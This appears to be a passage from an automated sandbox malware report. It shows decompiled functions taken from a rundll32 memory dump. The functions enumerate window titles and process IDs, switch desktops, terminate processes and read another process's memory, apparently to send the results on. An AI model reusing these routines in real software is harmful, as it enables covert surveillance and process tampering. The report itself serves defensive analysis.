                                                                                              • Opcode ID: 99aff646b7a357f8d6f2fee8a59bb038dd1fbe2cb5e29e579ac940a8f5d502df
                                                                                              • Instruction ID: 08d84ea59f712447dfc02925d87b2554249d9b2f5f9fc62149c39d24c3db1c53
                                                                                              • Opcode Fuzzy Hash: 99aff646b7a357f8d6f2fee8a59bb038dd1fbe2cb5e29e579ac940a8f5d502df
                                                                                              • Instruction Fuzzy Hash: 02416E75314602EFD7049F69D888BA6FBA8FF04304F118259E91AC7290EB75BC95CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E042650C0(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                                                              				signed int _v8;
                                                                                              				short _v2056;
                                                                                              				void** _v2060;
                                                                                              				signed int _t18;
                                                                                              				void** _t20;
                                                                                              				signed int _t36;
                                                                                              				struct HWND__* _t44;
                                                                                              				void* _t50;
                                                                                              				void* _t51;
                                                                                              				void* _t52;
                                                                                              				int _t53;
                                                                                              				DWORD* _t54;
                                                                                              				signed int _t56;
                                                                                              
                                                                                              				_t52 = __esi;
                                                                                              				_t18 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t18 ^ _t56;
                                                                                              				_t20 = _a8;
                                                                                              				_t44 = _a4;
                                                                                              				_t50 =  *_t20;
                                                                                              				_v2060 = _t20;
                                                                                              				E0427DEA0(_t50,  &_v2056, 0, 0x400);
                                                                                              				GetWindowTextW(_t44,  &_v2056, 0x3ff);
                                                                                              				if(IsWindowVisible(_t44) != 0 && lstrlenW( &_v2056) != 0) {
                                                                                              					if(_t50 == 0) {
                                                                                              						_t50 = LocalAlloc(0x40, 1);
                                                                                              					}
                                                                                              					_push(_t52);
                                                                                              					_t53 = LocalSize(_t50);
                                                                                              					_t51 = LocalReAlloc(_t50, 6 + lstrlenW( &_v2056) * 2 + _t53, 0x42);
                                                                                              					_t54 = _t53 + _t51;
                                                                                              					GetWindowThreadProcessId(_t44, _t54);
                                                                                              					_t36 = lstrlenW( &_v2056);
                                                                                              					_t15 =  &(_t54[1]); // 0x4
                                                                                              					E0427E060(_t15,  &_v2056, 2 + _t36 * 2);
                                                                                              					 *_v2060 = _t51;
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t56);
                                                                                              			}
















                                                                                              0x042650c0
                                                                                              0x042650c9
                                                                                              0x042650d0
                                                                                              0x042650d3
                                                                                              0x042650d7
                                                                                              0x042650db
                                                                                              0x042650e2
                                                                                              0x042650f1
                                                                                              0x04265106
                                                                                              0x04265115
                                                                                              0x0426512e
                                                                                              0x0426513a
                                                                                              0x0426513a
                                                                                              0x0426513c
                                                                                              0x04265144
                                                                                              0x04265166
                                                                                              0x04265168
                                                                                              0x0426516c
                                                                                              0x04265179
                                                                                              0x0426518e
                                                                                              0x04265192
                                                                                              0x042651a0
                                                                                              0x042651a2
                                                                                              0x042651b4

                                                                                              APIs
                                                                                              • GetWindowTextW.USER32(?,?,000003FF), ref: 04265106
                                                                                              • IsWindowVisible.USER32(?), ref: 0426510D
                                                                                              • lstrlenW.KERNEL32(?), ref: 04265122
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 04265134
                                                                                              • LocalSize.KERNEL32 ref: 0426513E
                                                                                              • lstrlenW.KERNEL32(?), ref: 0426514D
                                                                                              • LocalReAlloc.KERNEL32(?,?,00000042), ref: 04265160
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0426516C
                                                                                              • lstrlenW.KERNEL32(?,?,?,00000042), ref: 04265179
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                                                              • String ID:
                                                                                              • API String ID: 925664022-0
                                                                                              • Opcode ID: 0fddcba2980891b4a03ee96e207d98d6065c9eafc7f6b543c23eed331450985d
                                                                                              • Instruction ID: e9f14585928ebc0e39aa6d43f725f8a8d3110ab8955301ea5ae8959c0e29243f
                                                                                              • Opcode Fuzzy Hash: 0fddcba2980891b4a03ee96e207d98d6065c9eafc7f6b543c23eed331450985d
                                                                                              • Instruction Fuzzy Hash: 942141B6B40118ABD750AF64FC48F9AB7FCFB44715F0440A5FA4AD7140DE38AD458BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E04265570(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v264;
                                                                                              				char _v520;
                                                                                              				long _v524;
                                                                                              				struct HDESK__* _v528;
                                                                                              				signed int _t13;
                                                                                              				struct HDESK__* _t41;
                                                                                              				void* _t43;
                                                                                              				signed int _t46;
                                                                                              
                                                                                              				_t13 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t13 ^ _t46;
                                                                                              				_t43 = GetThreadDesktop(GetCurrentThreadId());
                                                                                              				_v528 = _t43;
                                                                                              				E0427DEA0(__edi,  &_v264, 0, 0x100);
                                                                                              				GetUserObjectInformationA(_t43, 2,  &_v264, 0x100,  &_v524);
                                                                                              				_t41 = OpenInputDesktop(0, 0, 0x2000000);
                                                                                              				E0427DEA0(_t41,  &_v520, 0, 0x100);
                                                                                              				GetUserObjectInformationA(_t41, 2,  &_v520, 0x100,  &_v524);
                                                                                              				if(lstrcmpiA( &_v520,  &_v264) != 0) {
                                                                                              					SetThreadDesktop(_t41);
                                                                                              				}
                                                                                              				CloseDesktop(_v528);
                                                                                              				CloseDesktop(_t41);
                                                                                              				return E04275AFE(_v8 ^ _t46);
                                                                                              			}












                                                                                              0x04265579
                                                                                              0x04265580
                                                                                              0x04265595
                                                                                              0x042655a5
                                                                                              0x042655ab
                                                                                              0x042655cf
                                                                                              0x042655e5
                                                                                              0x042655f0
                                                                                              0x0426560e
                                                                                              0x04265626
                                                                                              0x04265629
                                                                                              0x0426562f
                                                                                              0x0426563d
                                                                                              0x04265640
                                                                                              0x04265654

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04265588
                                                                                              • GetThreadDesktop.USER32(00000000), ref: 0426558F
                                                                                              • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 042655CF
                                                                                              • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 042655DA
                                                                                              • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0426560E
                                                                                              • lstrcmpi.KERNEL32(?,?), ref: 0426561E
                                                                                              • SetThreadDesktop.USER32(00000000), ref: 04265629
                                                                                              • CloseDesktop.USER32(?), ref: 0426563D
                                                                                              • CloseDesktop.USER32(00000000), ref: 04265640
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3718465862-0
                                                                                              • Opcode ID: 6f9669a3d32fd7010737a439506f602fb66c879465b1cc646ae88831f8dbd09c
                                                                                              • Instruction ID: c1dd401c7bd79be2c80e79aad9c0bb78aee9fd5017205c2775ebe2f1227d10d2
                                                                                              • Opcode Fuzzy Hash: 6f9669a3d32fd7010737a439506f602fb66c879465b1cc646ae88831f8dbd09c
                                                                                              • Instruction Fuzzy Hash: B22169B6B502187BE721AB64EC4DFEA777CEB54710F000196FA05E7181DAB46E85CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 33%
                                                                                              			E04264380(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                                                              				intOrPtr _v8;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t16;
                                                                                              				int _t17;
                                                                                              				int _t20;
                                                                                              				void* _t28;
                                                                                              				intOrPtr _t31;
                                                                                              				void* _t34;
                                                                                              				void* _t36;
                                                                                              				void* _t39;
                                                                                              				void* _t40;
                                                                                              				void* _t42;
                                                                                              
                                                                                              				_t31 = __ecx;
                                                                                              				_push(__ecx);
                                                                                              				_t28 = _a8;
                                                                                              				_push(_t39);
                                                                                              				_t36 = 0;
                                                                                              				_v8 = __ecx;
                                                                                              				if(_t28 == 0) {
                                                                                              					L2:
                                                                                              					Sleep(0x64);
                                                                                              					_t40 = E04264C00(_t28, _t34, _t36, _t39);
                                                                                              					if(_t40 != 0) {
                                                                                              						_t20 = LocalSize(_t40);
                                                                                              						_push(_t31);
                                                                                              						_push(0x3f);
                                                                                              						_push(_t20);
                                                                                              						_push(_t40);
                                                                                              						_t31 =  *((intOrPtr*)(_v8 + 4));
                                                                                              						E04251C60(_t31);
                                                                                              						LocalFree(_t40);
                                                                                              					}
                                                                                              					_a8 = 0;
                                                                                              					EnumWindows(E042650C0,  &_a8);
                                                                                              					_t16 = _a8;
                                                                                              					if(_t16 != 0) {
                                                                                              						 *_t16 = 0x82;
                                                                                              						_t42 = _a8;
                                                                                              						if(_t42 != 0) {
                                                                                              							_t17 = LocalSize(_t42);
                                                                                              							_push(_t31);
                                                                                              							_push(0x3f);
                                                                                              							_push(_t17);
                                                                                              							_push(_t42);
                                                                                              							E04251C60( *((intOrPtr*)(_v8 + 4)));
                                                                                              							_t16 = LocalFree(_t42);
                                                                                              						}
                                                                                              					}
                                                                                              					return _t16;
                                                                                              				} else {
                                                                                              					goto L1;
                                                                                              				}
                                                                                              				do {
                                                                                              					L1:
                                                                                              					_t39 = OpenProcess(0x1fffff, 0,  *(_t36 + _a4));
                                                                                              					TerminateProcess(_t39, 0);
                                                                                              					CloseHandle(_t39);
                                                                                              					_t36 = _t36 + 4;
                                                                                              				} while (_t36 < _t28);
                                                                                              				goto L2;
                                                                                              			}

















                                                                                              0x04264380
                                                                                              0x04264383
                                                                                              0x04264385
                                                                                              0x04264388
                                                                                              0x0426438a
                                                                                              0x0426438c
                                                                                              0x04264391
                                                                                              0x042643bf
                                                                                              0x042643c1
                                                                                              0x042643d2
                                                                                              0x042643dc
                                                                                              0x042643df
                                                                                              0x042643e1
                                                                                              0x042643e5
                                                                                              0x042643e7
                                                                                              0x042643e8
                                                                                              0x042643e9
                                                                                              0x042643ec
                                                                                              0x042643f2
                                                                                              0x042643f2
                                                                                              0x042643f7
                                                                                              0x04264404
                                                                                              0x0426440a
                                                                                              0x0426440f
                                                                                              0x04264411
                                                                                              0x04264414
                                                                                              0x04264419
                                                                                              0x0426441c
                                                                                              0x0426441e
                                                                                              0x0426441f
                                                                                              0x04264421
                                                                                              0x04264425
                                                                                              0x04264429
                                                                                              0x0426442f
                                                                                              0x0426442f
                                                                                              0x04264419
                                                                                              0x04264437
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04264393
                                                                                              0x04264393
                                                                                              0x042643a6
                                                                                              0x042643ab
                                                                                              0x042643b2
                                                                                              0x042643b8
                                                                                              0x042643bb
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,042642D4,?,?), ref: 042643A0
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,042642D4,?,?), ref: 042643AB
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,042642D4,?,?), ref: 042643B2
                                                                                              • Sleep.KERNEL32(00000064,?,?,?,?,?,042642D4,?,?), ref: 042643C1
                                                                                              • LocalSize.KERNEL32(00000000), ref: 042643DF
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,?,042642D4,?,?), ref: 042643F2
                                                                                              • EnumWindows.USER32(042650C0,?), ref: 04264404
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0426441C
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,?,042642D4,?,?), ref: 0426442F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$FreeProcessSize$CloseEnumHandleOpenSleepTerminateWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1695776769-0
                                                                                              • Opcode ID: 0e9160c7c1b5cf531e7db7e5759867430ef7856054a663f58adb669e4c47e5a1
                                                                                              • Instruction ID: 3e8de33fae31356367529af12f10e153aaee25ce6d2f01b4d3d38434e02c9976
                                                                                              • Opcode Fuzzy Hash: 0e9160c7c1b5cf531e7db7e5759867430ef7856054a663f58adb669e4c47e5a1
                                                                                              • Instruction Fuzzy Hash: D111AE32711214BBD315BFA9EC48FAEB7ACEF4A710F114115FD05A7240CA74BE018BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E042626C0(intOrPtr* __ecx) {
                                                                                              				int _t29;
                                                                                              				intOrPtr* _t33;
                                                                                              				void* _t34;
                                                                                              				struct HICON__** _t37;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				_t33 = __ecx;
                                                                                              				 *__ecx = 0x429ecb4;
                                                                                              				ReleaseDC( *(__ecx + 0x104),  *(__ecx + 0x3c));
                                                                                              				DeleteDC( *(_t33 + 0x40));
                                                                                              				DeleteDC( *(_t33 + 0x44));
                                                                                              				DeleteDC( *(_t33 + 0x48));
                                                                                              				DeleteDC( *(_t33 + 0x78));
                                                                                              				DeleteObject( *(_t33 + 0x4c));
                                                                                              				DeleteObject( *(_t33 + 0x50));
                                                                                              				DeleteObject( *(_t33 + 0x7c));
                                                                                              				_t25 =  *((intOrPtr*)(_t33 + 0x14));
                                                                                              				if( *((intOrPtr*)(_t33 + 0x14)) != 0) {
                                                                                              					E04275B0F(_t25);
                                                                                              					_t38 = _t38 + 4;
                                                                                              				}
                                                                                              				E04275B0F( *((intOrPtr*)(_t33 + 0x60)));
                                                                                              				E04275B0F( *((intOrPtr*)(_t33 + 0x5c)));
                                                                                              				E04275B0F( *((intOrPtr*)(_t33 + 0x64)));
                                                                                              				_t37 = _t33 + 0xc4;
                                                                                              				 *((intOrPtr*)(_t33 + 0x80)) = 0x429ec9c;
                                                                                              				_t34 = 0x10;
                                                                                              				do {
                                                                                              					_t29 = DestroyCursor( *_t37);
                                                                                              					_t37 =  &(_t37[1]);
                                                                                              					_t34 = _t34 - 1;
                                                                                              				} while (_t34 != 0);
                                                                                              				return _t29;
                                                                                              			}








                                                                                              0x042626c3
                                                                                              0x042626c8
                                                                                              0x042626d4
                                                                                              0x042626e3
                                                                                              0x042626e8
                                                                                              0x042626ed
                                                                                              0x042626f2
                                                                                              0x042626fd
                                                                                              0x04262702
                                                                                              0x04262707
                                                                                              0x04262709
                                                                                              0x0426270e
                                                                                              0x04262711
                                                                                              0x04262716
                                                                                              0x04262716
                                                                                              0x0426271c
                                                                                              0x04262724
                                                                                              0x0426272c
                                                                                              0x04262737
                                                                                              0x0426273d
                                                                                              0x0426274a
                                                                                              0x04262750
                                                                                              0x04262752
                                                                                              0x04262754
                                                                                              0x04262757
                                                                                              0x04262757
                                                                                              0x0426275f

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Delete$Object$CursorDestroyRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1665608007-0
                                                                                              • Opcode ID: 9fcd60797e6625b6e5d6d6b05d4e0006c6ca115c6493f146fa9a733a506504d6
                                                                                              • Instruction ID: 61b0127f560efa2e0851cf1448eb5986bd04cdf2b21c71073f2ef81d7cd71b9e
                                                                                              • Opcode Fuzzy Hash: 9fcd60797e6625b6e5d6d6b05d4e0006c6ca115c6493f146fa9a733a506504d6
                                                                                              • Instruction Fuzzy Hash: 98113972B10426FBDB126F25ED48A46FF66FF002587000022E50953A20CB32BC76EFD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 25%
                                                                                              			E04255D7C(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a12) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v32;
                                                                                              				intOrPtr _v72;
                                                                                              				intOrPtr _v76;
                                                                                              				char _v84;
                                                                                              				intOrPtr _v976;
                                                                                              				intOrPtr _v980;
                                                                                              				signed int _v988;
                                                                                              				char _v1100;
                                                                                              				intOrPtr _v1968;
                                                                                              				intOrPtr _v1972;
                                                                                              				char _v2004;
                                                                                              				intOrPtr _v2008;
                                                                                              				char _v2012;
                                                                                              				intOrPtr _v2016;
                                                                                              				signed int _t61;
                                                                                              				struct HINSTANCE__* _t63;
                                                                                              				struct HINSTANCE__* _t65;
                                                                                              				signed int _t86;
                                                                                              				intOrPtr* _t110;
                                                                                              				intOrPtr* _t114;
                                                                                              				intOrPtr _t133;
                                                                                              				intOrPtr* _t135;
                                                                                              				intOrPtr* _t140;
                                                                                              				intOrPtr _t143;
                                                                                              				void* _t144;
                                                                                              				signed int _t147;
                                                                                              				void* _t151;
                                                                                              				signed int _t152;
                                                                                              				intOrPtr _t175;
                                                                                              
                                                                                              				_t114 = __ecx;
                                                                                              				L04275B81(_a12);
                                                                                              				_t152 = _t151 + 4;
                                                                                              				E0427DE28(0, 0);
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				_t147 = _t152;
                                                                                              				_t61 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t61 ^ _t147;
                                                                                              				_push(__esi);
                                                                                              				_v2016 = __edx;
                                                                                              				_t135 = _t114;
                                                                                              				_t63 = GetModuleHandleA("ntdll.dll");
                                                                                              				if(_t63 != 0) {
                                                                                              					L4:
                                                                                              					_t140 = GetProcAddress(_t63, "NtWow64QueryInformationProcess64");
                                                                                              				} else {
                                                                                              					_t63 = LoadLibraryA("ntdll.dll");
                                                                                              					if(_t63 != 0) {
                                                                                              						goto L4;
                                                                                              					} else {
                                                                                              						_t140 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				_t65 = GetModuleHandleA("ntdll.dll");
                                                                                              				if(_t65 != 0) {
                                                                                              					L8:
                                                                                              					_t110 = GetProcAddress(_t65, "NtWow64ReadVirtualMemory64");
                                                                                              				} else {
                                                                                              					_t65 = LoadLibraryA("ntdll.dll");
                                                                                              					if(_t65 != 0) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						_t110 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				if(_t140 == 0 || _t110 == 0) {
                                                                                              					 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                                                              					 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                                                              					 *_t135 = 0;
                                                                                              					E042532A0(_t135, 0x429c5d0);
                                                                                              					__eflags = _v8 ^ _t147;
                                                                                              					return E04275AFE(_v8 ^ _t147, 0);
                                                                                              				} else {
                                                                                              					E0427DEA0(_t135,  &_v84, 0, 0x30);
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					asm("movlpd [ebp-0x7d8], xmm0");
                                                                                              					_push( &_v2012);
                                                                                              					_push(0x30);
                                                                                              					_push( &_v84);
                                                                                              					_push(0);
                                                                                              					_push(_v2016);
                                                                                              					if( *_t140() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                                                              						L25:
                                                                                              						E042531B0(_t135, _t135, 0x429c5d0);
                                                                                              						__eflags = _v8 ^ _t147;
                                                                                              						return E04275AFE(_v8 ^ _t147);
                                                                                              					} else {
                                                                                              						_t143 = _v2016;
                                                                                              						_push( &_v2012);
                                                                                              						_push(0);
                                                                                              						_push(0x388);
                                                                                              						_push( &_v2004);
                                                                                              						_push(_v72);
                                                                                              						_push(_v76);
                                                                                              						_push(_t143);
                                                                                              						if( *_t110() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                                                              							goto L25;
                                                                                              						} else {
                                                                                              							_push( &_v2012);
                                                                                              							_push(0);
                                                                                              							_push(0x3f8);
                                                                                              							_push( &_v1100);
                                                                                              							_push(_v1968);
                                                                                              							_push(_v1972);
                                                                                              							_push(_t143);
                                                                                              							if( *_t110() < 0 || _v2012 != 0x3f8) {
                                                                                              								goto L25;
                                                                                              							} else {
                                                                                              								_t175 = _v2008;
                                                                                              								if(_t175 != 0) {
                                                                                              									goto L25;
                                                                                              								} else {
                                                                                              									_t86 = (_v988 & 0x0000ffff) + 1;
                                                                                              									_t144 = E04275B55( ~(_t175 > 0) | _t86 * 0x00000002, _t143, _t175);
                                                                                              									E0427DEA0(_t135, _t144, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                                                              									asm("cdq");
                                                                                              									 *_t110(_v2016, _v980, _v976, _t144, _v988 & 0x0000ffff, _t86 * 2 >> 0x20,  &_v2012,  ~(_t175 > 0) | _t86 * 0x00000002);
                                                                                              									E042531B0( &_v32, _t135, _t144);
                                                                                              									E04275B0F(_t144);
                                                                                              									 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                                                              									 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                                                              									 *_t135 = 0;
                                                                                              									_t133 = _v12;
                                                                                              									if(_t133 >= 8) {
                                                                                              										 *_t135 = _v32;
                                                                                              										_v32 = 0;
                                                                                              									} else {
                                                                                              										_t104 = _v16 + 1;
                                                                                              										if(_v16 + 1 != 0) {
                                                                                              											E0427D060(_t135,  &_v32, _t104 + _t104);
                                                                                              											_t133 = _v12;
                                                                                              										}
                                                                                              									}
                                                                                              									 *((intOrPtr*)(_t135 + 0x10)) = _v16;
                                                                                              									 *((intOrPtr*)(_t135 + 0x14)) = _t133;
                                                                                              									_v12 = 7;
                                                                                              									_v16 = 0;
                                                                                              									_v32 = 0;
                                                                                              									E04253170( &_v32);
                                                                                              									return E04275AFE(_v8 ^ _t147);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}



































                                                                                              0x04255d7c
                                                                                              0x04255d7f
                                                                                              0x04255d84
                                                                                              0x04255d8b
                                                                                              0x04255d90
                                                                                              0x04255d91
                                                                                              0x04255d92
                                                                                              0x04255d93
                                                                                              0x04255d94
                                                                                              0x04255d95
                                                                                              0x04255d96
                                                                                              0x04255d97
                                                                                              0x04255d98
                                                                                              0x04255d99
                                                                                              0x04255d9a
                                                                                              0x04255d9b
                                                                                              0x04255d9c
                                                                                              0x04255d9d
                                                                                              0x04255d9e
                                                                                              0x04255d9f
                                                                                              0x04255da1
                                                                                              0x04255da9
                                                                                              0x04255db0
                                                                                              0x04255db4
                                                                                              0x04255dbb
                                                                                              0x04255dc1
                                                                                              0x04255dc3
                                                                                              0x04255dd1
                                                                                              0x04255de2
                                                                                              0x04255dee
                                                                                              0x04255dd3
                                                                                              0x04255dd8
                                                                                              0x04255ddc
                                                                                              0x00000000
                                                                                              0x04255dde
                                                                                              0x04255dde
                                                                                              0x04255dde
                                                                                              0x04255ddc
                                                                                              0x04255df5
                                                                                              0x04255dfd
                                                                                              0x04255e0e
                                                                                              0x04255e1a
                                                                                              0x04255dff
                                                                                              0x04255e04
                                                                                              0x04255e08
                                                                                              0x00000000
                                                                                              0x04255e0a
                                                                                              0x04255e0a
                                                                                              0x04255e0a
                                                                                              0x04255e08
                                                                                              0x04255e1e
                                                                                              0x04256021
                                                                                              0x04256029
                                                                                              0x04256037
                                                                                              0x0425603a
                                                                                              0x04256046
                                                                                              0x04256051
                                                                                              0x04255e2c
                                                                                              0x04255e34
                                                                                              0x04255e42
                                                                                              0x04255e45
                                                                                              0x04255e4d
                                                                                              0x04255e4e
                                                                                              0x04255e53
                                                                                              0x04255e54
                                                                                              0x04255e56
                                                                                              0x04255e60
                                                                                              0x04256000
                                                                                              0x04256007
                                                                                              0x04256014
                                                                                              0x0425601e
                                                                                              0x04255e80
                                                                                              0x04255e80
                                                                                              0x04255e8c
                                                                                              0x04255e8d
                                                                                              0x04255e8f
                                                                                              0x04255e9a
                                                                                              0x04255e9b
                                                                                              0x04255e9e
                                                                                              0x04255ea1
                                                                                              0x04255ea6
                                                                                              0x00000000
                                                                                              0x04255ec9
                                                                                              0x04255ecf
                                                                                              0x04255ed0
                                                                                              0x04255ed2
                                                                                              0x04255edd
                                                                                              0x04255ede
                                                                                              0x04255ee4
                                                                                              0x04255eea
                                                                                              0x04255eef
                                                                                              0x00000000
                                                                                              0x04255f05
                                                                                              0x04255f05
                                                                                              0x04255f0c
                                                                                              0x00000000
                                                                                              0x04255f12
                                                                                              0x04255f1b
                                                                                              0x04255f30
                                                                                              0x04255f44
                                                                                              0x04255f5a
                                                                                              0x04255f70
                                                                                              0x04255f76
                                                                                              0x04255f7c
                                                                                              0x04255f83
                                                                                              0x04255f8a
                                                                                              0x04255f94
                                                                                              0x04255f97
                                                                                              0x04255f9d
                                                                                              0x04255fbf
                                                                                              0x04255fc1
                                                                                              0x04255f9f
                                                                                              0x04255fa2
                                                                                              0x04255fa5
                                                                                              0x04255faf
                                                                                              0x04255fb4
                                                                                              0x04255fb7
                                                                                              0x04255fa5
                                                                                              0x04255fcd
                                                                                              0x04255fd3
                                                                                              0x04255fd6
                                                                                              0x04255fdd
                                                                                              0x04255fe4
                                                                                              0x04255fe8
                                                                                              0x04255fff
                                                                                              0x04255fff
                                                                                              0x04255f0c
                                                                                              0x04255eef
                                                                                              0x04255ea6
                                                                                              0x04255e60

                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 04255D8B
                                                                                                • Part of subcall function 0427DE28: RaiseException.KERNEL32(?,?,?,04276A2F,769C4560,00000000,?,?,?,?,?,?,04276A2F,04275B38,042A160C,04275B38), ref: 0427DE87
                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04255DC3
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04255DD8
                                                                                              • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04255DE8
                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04255DF5
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04255E04
                                                                                              • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04255E14
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc$ExceptionException@8RaiseThrow
                                                                                              • String ID: 0$ntdll.dll
                                                                                              • API String ID: 3650064235-1737626548
                                                                                              • Opcode ID: 733331ced130e7630f7249d15d8a95a4952d608efee5a512058b458b495035a8
                                                                                              • Instruction ID: 2950ba3cbf57c8c6b707806a82f76987d37e1a2548175fe84afb63aead811129
                                                                                              • Opcode Fuzzy Hash: 733331ced130e7630f7249d15d8a95a4952d608efee5a512058b458b495035a8
                                                                                              • Instruction Fuzzy Hash: A3517671F24219ABEB619F60DC40BBEB7B8EF04714F8040A6E90DA5550EB78BE84CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E04265DD0(void* __ebx, short* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                              				signed int _v8;
                                                                                              				short _v528;
                                                                                              				void* _v532;
                                                                                              				int _v536;
                                                                                              				short* _v540;
                                                                                              				void* _v544;
                                                                                              				int _v548;
                                                                                              				int _v552;
                                                                                              				intOrPtr _v556;
                                                                                              				intOrPtr _v560;
                                                                                              				signed int _t45;
                                                                                              				intOrPtr _t47;
                                                                                              				intOrPtr _t48;
                                                                                              				intOrPtr _t49;
